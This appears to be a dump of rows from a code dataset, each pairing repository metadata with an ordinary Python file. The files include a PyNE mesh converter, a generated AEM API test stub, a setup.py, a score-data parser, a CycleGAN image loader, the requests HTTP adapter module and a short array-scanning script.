a64392e3395afc046326b7dcf81e4ff7429f873d
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
py1sl/pyne_based_tools
|
8a6f9172125bcf24698d2c3d0a3ef5b493eaea1c
|
92bd8865b9e9de78d24a2e635e0f2e826bad5e61
|
refs/heads/master
| 2021-01-19T03:13:11.600946
| 2017-09-12T09:49:35
| 2017-09-12T09:49:35
| 55,595,092
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 503
|
py
|
from pyne import mcnp
from itaps import iBase, iMesh
import h5py
import sys
from subprocess import call
def convert_wwinp(argv):
"""simple conversion of wwinp to vtk via h5m """
in_path = argv[0]
out_path = argv[1]
wwinp_mesh = mcnp.Wwinp()
wwinp_mesh.read_wwinp(in_path)
wwinp_mesh.mesh.save(out_path+".h5m")
call(["expand_tags.py", out_path+".h5m" , "-o", out_path+".vtk"])
call(["rm", out_path+".h5m"])
if __name__ == "__main__":
convert_wwinp(sys.argv[1:])
|
[
"steven.lilley@stfc.ac.uk"
] |
steven.lilley@stfc.ac.uk
|
ddc87bfca79fabe3d914696f58497118d2d0d193
|
5ec06dab1409d790496ce082dacb321392b32fe9
|
/clients/python/generated/test/test_com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info.py
|
d51b3347b77c7b18680b18281fcd2bb012c5ead3
|
[
"Apache-2.0"
] |
permissive
|
shinesolutions/swagger-aem-osgi
|
e9d2385f44bee70e5bbdc0d577e99a9f2525266f
|
c2f6e076971d2592c1cbd3f70695c679e807396b
|
refs/heads/master
| 2022-10-29T13:07:40.422092
| 2021-04-09T07:46:03
| 2021-04-09T07:46:03
| 190,217,155
| 3
| 3
|
Apache-2.0
| 2022-10-05T03:26:20
| 2019-06-04T14:23:28
| null |
UTF-8
|
Python
| false
| false
| 1,359
|
py
|
# coding: utf-8
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import swaggeraemosgi
from swaggeraemosgi.models.com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info import ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo # noqa: E501
from swaggeraemosgi.rest import ApiException
class TestComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo(unittest.TestCase):
"""ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo(self):
"""Test ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo"""
# FIXME: construct object with mandatory attributes with example values
# model = swaggeraemosgi.models.com_adobe_cq_wcm_mobile_qrcode_servlet_qr_code_image_generator_info.ComAdobeCqWcmMobileQrcodeServletQRCodeImageGeneratorInfo() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"michael.bloch@shinesolutions.com"
] |
michael.bloch@shinesolutions.com
|
72dc217f031f0e0fe7fb784bc8ac8024f1dc926e
|
340d83cbefd7a9c88b18ff25f6f5dd90e1131ad6
|
/setup.py
|
54baf8251ca1cb7f55ed33f6ffb2465951c6bfb5
|
[
"MIT"
] |
permissive
|
PTC-CMC/calculator
|
50304326acfd501a6503d59ad81cc3502b21d934
|
e89ab40336ebe57e3a2c272281f9160a212e7055
|
refs/heads/master
| 2022-10-03T19:21:48.502774
| 2020-06-04T19:54:30
| 2020-06-04T19:54:30
| 269,222,035
| 0
| 5
|
MIT
| 2020-06-04T19:54:31
| 2020-06-04T00:17:00
|
Python
|
UTF-8
|
Python
| false
| false
| 232
|
py
|
from setuptools import setup
# Originally an idea and implementation by Matt Thompson
# https://github.com/mattwthompson/calculator
setup(
name='Calculator',
version='0.0',
packages=['calculator',],
license='MIT',
)
|
[
"justin.b.gilmer@vanderbilt.edu"
] |
justin.b.gilmer@vanderbilt.edu
|
e50d54beea6551c36fdd72ef808ecc04b47ee774
|
1445a2e276630a3ba30522a7efd8bd35387ac525
|
/sheets/getPointData.py
|
e5065f4d3382872d7b3f212385503e5bf9432af4
|
[] |
no_license
|
Wu-jiaming/score
|
7cbc071fc28b2c909c477abe319277f0ccd4e7f4
|
e8b679ad8e88164de2070e1d08e92ab24f440aa8
|
refs/heads/master
| 2020-03-22T15:57:10.492895
| 2018-09-02T15:00:48
| 2018-09-02T15:00:48
| 140,291,736
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,433
|
py
|
"""
获取结点信息,保存为【(),()】格式,
对数据进行排序
格式转换为[{key:value}]格式,目的是分组
分组之后,自个组的key,value保存成[[key],[key]],[[value],[value]]
"""
import re
from operator import itemgetter
from itertools import groupby
"""
获取相关节点
"""
def get_point(sourcePath):
print("sourcepath:", sourcePath)
fR = open(sourcePath, 'r+' , encoding='utf-8')
lines = fR.readlines()
pointList = []
pointLists = []
for line in lines:
pointPattern = re.compile(r'.*?Point\.(.*?)s.*?opt1:"(.*?)".*?opt2:"(.*?)"')
pointList = re.match(pointPattern, line)
if pointList is not None:
#pointLists.append(())
score = pointList.group(1)
s1 = pointList.group(2)
s2 = pointList.group(3)
pointLists.append((float(score), float(s1), float(s2)))
#pointList.append()
#print(line)
#return line
fR.close()
print("pointList:", pointList)
return pointLists
"""
排序
如果是所个关键词比较,可以用一下方法,先比较第一关键词,相等再比较第二个
#lists.sort(key=operator.itemgetter(0,1))
lists.sort(key=lambda x:(x[0],x[1]))
"""
def listSort(lists):
#operator.itemgetter排序,0表示第一个维度,1表示第二维度
#lists.sort(key=operator.itemgetter(0))
lists.sort(key=lambda x:(x[0]))
print("lists:", lists)
return lists
#把原有的格式list[(1,2,3)]转化成dict,{'key':1,'value':(1,2,3)}
#目的是为了进行分组,分组需要key
def getLists(lists):
dLists=[]
for i,value in enumerate(lists):
d={}
flag = value[0]
d['key'] = flag
d['value'] = value
dLists.append(d)
return dLists
#把dict分组,使用了groupby的方法分组之前,得先排序sort
#迭代,分别将key和value保存到2个list(groupName,groupValue)
def groupLists(lists):
dLists = getLists(lists)
#分组之前最好先排序
dLists.sort(key = itemgetter('key'))
groupLists = groupby(dLists, itemgetter('key'))
#组名 组的值
groupName = []
groupValue = []
for key,group in groupLists:
groupName.append(key)
v = []
for value in group:
v.append(value['value'])
#print("value:", value['value'])
groupValue.append(v)
return (groupName,groupValue)
|
[
"754205661@qq.com"
] |
754205661@qq.com
|
06a103582032ffff0d67b7ec6ac252dc5b255a8d
|
91d48932143ced234aa13b35a597b809c757e928
|
/cyclegan/load_data.py
|
ca9b07ce1717e3fe5c4769447ec1845be6ef5d6b
|
[] |
no_license
|
starbucksdolcelatte/FittingroomAnywhere2
|
9b86e76b592960c1350f54ace84a2e0cc64ab7e7
|
147e04eb8f326f25bafdb917e1b1d4974798d230
|
refs/heads/master
| 2020-07-11T17:16:38.331533
| 2019-10-11T03:18:34
| 2019-10-11T03:18:34
| 204,602,862
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,698
|
py
|
import os
import numpy as np
from PIL import Image
from keras.utils import Sequence
#from skimage.io import imread
def load_data(nr_of_channels, batch_size=1, nr_A_train_imgs=None, nr_B_train_imgs=None,
nr_A_test_imgs=None, nr_B_test_imgs=None, project_dir = '', subfolder='',
generator=False, D_model=None, use_multiscale_discriminator=False, use_supervised_learning=False, REAL_LABEL=1.0):
trainA_path = os.path.join(project_dir, 'datasets', subfolder, 'trainA')
trainB_path = os.path.join(project_dir, 'datasets', subfolder, 'trainB')
testA_path = os.path.join(project_dir, 'datasets', subfolder, 'testA')
testB_path = os.path.join(project_dir, 'datasets', subfolder, 'testB')
trainA_image_names = os.listdir(trainA_path)
if nr_A_train_imgs != None:
trainA_image_names = trainA_image_names[:nr_A_train_imgs]
trainB_image_names = os.listdir(trainB_path)
if nr_B_train_imgs != None:
trainB_image_names = trainB_image_names[:nr_B_train_imgs]
testA_image_names = os.listdir(testA_path)
if nr_A_test_imgs != None:
testA_image_names = testA_image_names[:nr_A_test_imgs]
testB_image_names = os.listdir(testB_path)
if nr_B_test_imgs != None:
testB_image_names = testB_image_names[:nr_B_test_imgs]
if generator:
return data_sequence(trainA_path, trainB_path, trainA_image_names, trainB_image_names, batch_size=batch_size) # D_model, use_multiscale_discriminator, use_supervised_learning, REAL_LABEL)
else:
trainA_images = create_image_array(trainA_image_names, trainA_path, nr_of_channels)
trainB_images = create_image_array(trainB_image_names, trainB_path, nr_of_channels)
testA_images = create_image_array(testA_image_names, testA_path, nr_of_channels)
testB_images = create_image_array(testB_image_names, testB_path, nr_of_channels)
return {"trainA_images": trainA_images, "trainB_images": trainB_images,
"testA_images": testA_images, "testB_images": testB_images,
"trainA_image_names": trainA_image_names,
"trainB_image_names": trainB_image_names,
"testA_image_names": testA_image_names,
"testB_image_names": testB_image_names}
def load_one(nr_of_channels, project_dir='', subfolder=''):
input_path = os.path.join(project_dir, 'datasets', subfolder, 'segmented') # load segmented tshirt image for fake generation
input_image_name = os.listdir(input_path)[0] # read only one image
input_image = create_image_array(input_image_name, input_path, nr_of_channels)
return {"input_image": input_image, "input_image_name": input_image_name}
def create_image_array(image_list, image_path, nr_of_channels):
image_array = []
for image_name in image_list:
if image_name[-1].lower() == 'g': # to avoid e.g. thumbs.db files
if nr_of_channels == 1: # Gray scale image -> MR image
image = np.array(Image.open(os.path.join(image_path, image_name)))
image = image[:, :, np.newaxis]
else: # RGB image -> street view
image = np.array(Image.open(os.path.join(image_path, image_name)))
image = normalize_array(image)
image_array.append(image)
return np.array(image_array)
# If using 16 bit depth images, use the formula 'array = array / 32767.5 - 1' instead
def normalize_array(array):
array = array / 127.5 - 1
return array
class data_sequence(Sequence):
def __init__(self, trainA_path, trainB_path, image_list_A, image_list_B, batch_size=1): # , D_model, use_multiscale_discriminator, use_supervised_learning, REAL_LABEL):
self.batch_size = batch_size
self.train_A = []
self.train_B = []
for image_name in image_list_A:
if image_name[-1].lower() == 'g': # to avoid e.g. thumbs.db files
self.train_A.append(os.path.join(trainA_path, image_name))
for image_name in image_list_B:
if image_name[-1].lower() == 'g': # to avoid e.g. thumbs.db files
self.train_B.append(os.path.join(trainB_path, image_name))
def __len__(self):
return int(max(len(self.train_A), len(self.train_B)) / float(self.batch_size))
def __getitem__(self, idx): # , use_multiscale_discriminator, use_supervised_learning):if loop_index + batch_size >= min_nr_imgs:
if idx >= min(len(self.train_A), len(self.train_B)):
# If all images soon are used for one domain,
# randomly pick from this domain
if len(self.train_A) <= len(self.train_B):
indexes_A = np.random.randint(len(self.train_A), size=self.batch_size)
batch_A = []
for i in indexes_A:
batch_A.append(self.train_A[i])
batch_B = self.train_B[idx * self.batch_size:(idx + 1) * self.batch_size]
else:
indexes_B = np.random.randint(len(self.train_B), size=self.batch_size)
batch_B = []
for i in indexes_B:
batch_B.append(self.train_B[i])
batch_A = self.train_A[idx * self.batch_size:(idx + 1) * self.batch_size]
else:
batch_A = self.train_A[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_B = self.train_B[idx * self.batch_size:(idx + 1) * self.batch_size]
real_images_A = create_image_array(batch_A, '', 3)
real_images_B = create_image_array(batch_B, '', 3)
return real_images_A, real_images_B # input_data, target_data
if __name__ == '__main__':
load_data()
|
[
"seoyoon9535@gmail.com"
] |
seoyoon9535@gmail.com
|
a1d1ee62356d167897f0766db41dcf93a9ca6203
|
c59a02471f295f93b56f9fadd51b47ec24414014
|
/historical/myenv/lib/python2.7/site-packages/pip/_vendor/requests/adapters.py
|
b48165bb7e18aced872069dd55d5b3a7989ca46d
|
[] |
no_license
|
jgdevelopment/Chronos-Backend
|
a3abe8bfea88d1456d03b2eaf411ab31d6b83fc1
|
548af4d7c8edc81c0b860862999dc0156b2e1fa2
|
refs/heads/master
| 2021-01-01T19:51:59.551831
| 2014-10-21T11:05:57
| 2014-10-21T11:05:57
| 16,659,327
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,968
|
py
|
# -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import socket
from .models import Response
from .packages.urllib3.poolmanager import PoolManager, proxy_from_url
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.util import Timeout as TimeoutSauce
from .compat import urlparse, basestring, urldefrag, unquote
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
except_on_missing_scheme, get_auth_from_url)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import TimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3.exceptions import ProxyError as _ProxyError
from .cookies import extract_cookies_to_jar
from .exceptions import ConnectionError, Timeout, SSLError, ProxyError
from .auth import _basic_auth_str
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
class BaseAdapter(object):
"""The Base Transport Adapter"""
def __init__(self):
super(BaseAdapter, self).__init__()
def send(self):
raise NotImplementedError
def close(self):
raise NotImplementedError
class HTTPAdapter(BaseAdapter):
"""The built-in HTTP Adapter for urllib3.
Provides a general-case interface for Requests sessions to contact HTTP and
HTTPS urls by implementing the Transport Adapter interface. This class will
usually be created by the :class:`Session <Session>` class under the
covers.
:param pool_connections: The number of urllib3 connection pools to cache.
:param pool_maxsize: The maximum number of connections to save in the pool.
:param max_retries: The maximum number of retries each connection should attempt.
:param pool_block: Whether the connection pool should block for connections.
Usage::
>>> import requests
>>> s = requests.Session()
>>> a = requests.adapters.HTTPAdapter()
>>> s.mount('http://', a)
"""
__attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
'_pool_block']
def __init__(self, pool_connections=DEFAULT_POOLSIZE,
pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
pool_block=DEFAULT_POOLBLOCK):
self.max_retries = max_retries
self.config = {}
self.proxy_manager = {}
super(HTTPAdapter, self).__init__()
self._pool_connections = pool_connections
self._pool_maxsize = pool_maxsize
self._pool_block = pool_block
self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
def __getstate__(self):
return dict((attr, getattr(self, attr, None)) for attr in
self.__attrs__)
def __setstate__(self, state):
for attr, value in state.items():
setattr(self, attr, value)
self.init_poolmanager(self._pool_connections, self._pool_maxsize,
block=self._pool_block)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK):
"""Initializes a urllib3 PoolManager. This method should not be called
from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param connections: The number of urllib3 connection pools to cache.
:param maxsize: The maximum number of connections to save in the pool.
:param block: Block when no free connections are available.
"""
# save these values for pickling
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
block=block)
def cert_verify(self, conn, url, verify, cert):
"""Verify a SSL certificate. This method should not be called from user
code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param conn: The urllib3 connection object associated with the cert.
:param url: The requested URL.
:param verify: Whether we should actually verify the certificate.
:param cert: The SSL certificate to verify.
"""
if url.lower().startswith('https') and verify:
cert_loc = None
# Allow self-specified cert location.
if verify is not True:
cert_loc = verify
if not cert_loc:
cert_loc = DEFAULT_CA_BUNDLE_PATH
if not cert_loc:
raise Exception("Could not find a suitable SSL CA certificate bundle.")
conn.cert_reqs = 'CERT_REQUIRED'
conn.ca_certs = cert_loc
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
if cert:
if not isinstance(cert, basestring):
conn.cert_file = cert[0]
conn.key_file = cert[1]
else:
conn.cert_file = cert
def build_response(self, req, resp):
"""Builds a :class:`Response <requests.Response>` object from a urllib3
response. This should not be called from user code, and is only exposed
for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
:param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
:param resp: The urllib3 response object.
"""
response = Response()
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
response.raw = resp
response.reason = response.raw.reason
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
# Add new cookies from the server.
extract_cookies_to_jar(response.cookies, req, resp)
# Give the Response some context.
response.request = req
response.connection = self
return response
def get_connection(self, url, proxies=None):
"""Returns a urllib3 connection for the given URL. This should not be
called from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param url: The URL to connect to.
:param proxies: (optional) A Requests-style dictionary of proxies used on this request.
"""
proxies = proxies or {}
proxy = proxies.get(urlparse(url.lower()).scheme)
if proxy:
except_on_missing_scheme(proxy)
proxy_headers = self.proxy_headers(proxy)
if not proxy in self.proxy_manager:
self.proxy_manager[proxy] = proxy_from_url(
proxy,
proxy_headers=proxy_headers)
conn = self.proxy_manager[proxy].connection_from_url(url)
else:
conn = self.poolmanager.connection_from_url(url.lower())
return conn
def close(self):
"""Disposes of any internal state.
Currently, this just closes the PoolManager, which closes pooled
connections.
"""
self.poolmanager.clear()
def request_url(self, request, proxies):
"""Obtain the url to use when making the final request.
If the message is being sent through a HTTP proxy, the full URL has to
be used. Otherwise, we should only use the path portion of the URL.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param proxies: A dictionary of schemes to proxy URLs.
"""
proxies = proxies or {}
scheme = urlparse(request.url).scheme.lower()
proxy = proxies.get(scheme)
if proxy and scheme != 'https':
url, _ = urldefrag(request.url)
else:
url = request.path_url
return url
def add_headers(self, request, **kwargs):
"""Add any headers needed by the connection. As of v2.0 this does
nothing by default, but is left for overriding by users that subclass
the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
:param kwargs: The keyword arguments from the call to send().
"""
pass
def proxy_headers(self, proxy):
"""Returns a dictionary of the headers to add to any request sent
through a proxy. This works with urllib3 magic to ensure that they are
correctly sent to the proxy, rather than in a tunnelled request if
CONNECT is being used.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxies: The url of the proxy being used for this request.
:param kwargs: Optional additional keyword arguments.
"""
headers = {}
username, password = get_auth_from_url(proxy)
if username and password:
# Proxy auth usernames and passwords will be urlencoded, we need
# to decode them.
username = unquote(username)
password = unquote(password)
headers['Proxy-Authorization'] = _basic_auth_str(username,
password)
return headers
def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) The timeout on the request.
:param verify: (optional) Whether to verify SSL certificates.
:param vert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
"""
conn = self.get_connection(request.url, proxies)
self.cert_verify(conn, request.url, verify, cert)
url = self.request_url(request, proxies)
self.add_headers(request)
chunked = not (request.body is None or 'Content-Length' in request.headers)
if stream:
timeout = TimeoutSauce(connect=timeout)
else:
timeout = TimeoutSauce(connect=timeout, read=timeout)
try:
if not chunked:
resp = conn.urlopen(
method=request.method,
url=url,
body=request.body,
headers=request.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=self.max_retries,
timeout=timeout
)
# Send the request.
else:
if hasattr(conn, 'proxy_pool'):
conn = conn.proxy_pool
low_conn = conn._get_conn(timeout=timeout)
low_conn.putrequest(request.method, url, skip_accept_encoding=True)
for header, value in request.headers.items():
low_conn.putheader(header, value)
low_conn.endheaders()
for i in request.body:
low_conn.send(hex(len(i))[2:].encode('utf-8'))
low_conn.send(b'\r\n')
low_conn.send(i)
low_conn.send(b'\r\n')
low_conn.send(b'0\r\n\r\n')
r = low_conn.getresponse()
resp = HTTPResponse.from_httplib(r,
pool=conn,
connection=low_conn,
preload_content=False,
decode_content=False
)
except socket.error as sockerr:
raise ConnectionError(sockerr)
except MaxRetryError as e:
raise ConnectionError(e)
except _ProxyError as e:
raise ProxyError(e)
except (_SSLError, _HTTPError) as e:
if isinstance(e, _SSLError):
raise SSLError(e)
elif isinstance(e, TimeoutError):
raise Timeout(e)
else:
raise
r = self.build_response(request, resp)
if not stream:
r.content
return r
|
[
"ginsdaman@gmail.com"
] |
ginsdaman@gmail.com
|
ee4b23bbf32042a37a0d791f5b2ca1db58e8570e
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2741/60666/264322.py
|
a8362f4be09e9d763b52af7aceca5c10738a7630
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
nums=eval(input())
if len(nums)<2:
print(nums)
else:
count=1
temp=1
for i in range(len(nums)-1):
if nums[i]<nums[i+1]:
count+=1
else:
temp=max(count,temp)
count=1
print(max(count,temp))
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.